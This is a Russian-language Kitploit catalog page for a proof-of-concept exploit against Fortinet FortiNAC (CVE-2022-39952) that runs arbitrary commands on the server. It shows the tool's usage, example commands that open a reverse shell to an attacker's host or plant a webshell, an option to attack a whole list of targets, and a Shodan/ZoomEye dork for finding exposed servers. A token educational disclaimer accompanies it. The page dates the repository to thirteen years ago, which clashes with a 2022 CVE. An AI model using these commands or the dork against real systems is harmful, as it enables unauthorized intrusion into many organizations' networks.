Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-39952-better — PoC для CVE-2022-39952, затрагивающего Fortinet FortiNAC. | Kitploit
Инструменты/GitHubGitHub/dkstar11q/cve-2022-39952-better
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubdkstar11q/cve-2022-39952-better

CVE-2022-39952-better

PoC для CVE-2022-39952, затрагивающего Fortinet FortiNAC.

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

FortiNAC CVE-2022-39952

PoC для CVE-2022-39952, затрагивающий Fortinet FortiNAC.

Этот эксплойт позволяет атакующему выполнять произвольные команды на сервере FortiNAC. Он основан на PoC, разработанном horizon3ai, с дополнительными опциями для атаки на несколько хостов.

Отказ от ответственности: Этот эксплойт предназначен только для образовательных целей. Пожалуйста, используйте ответственно и с разрешения.

Использование:

root@kitploit:~
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        The IP address of the target
  -l LIST, --list LIST  List of targets
  -lh LHOST, --lhost LHOST
                        The local host for the reverse shell
  -lp LPORT, --lport LPORT
                        The local port for the reverse shell

Чтобы использовать этот эксплойт, в вашей системе должен быть установлен Python 3.x.

Требования:

root@kitploit:~
Python 3.x
модуль requests
модуль concurrent.futures

Примеры:

Выполнение reverse shell на одной цели:

root@kitploit:~
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444

Выполнение webshell на одной цели:

root@kitploit:~
$ python exploit.py -t 192.168.1.100

Выполнение webshell на нескольких целях из списка:

root@kitploit:~
$ python exploit.py -l targets.txt

Примечание:

Этот эксплойт был протестирован только на ограниченном количестве целей, поэтому его эффективность может варьироваться. Дорк для поиска потенциальных целей на ZoomEye и Shodan:

title:"FortiNAC" +"JSESSIONID"

Скачать инструмент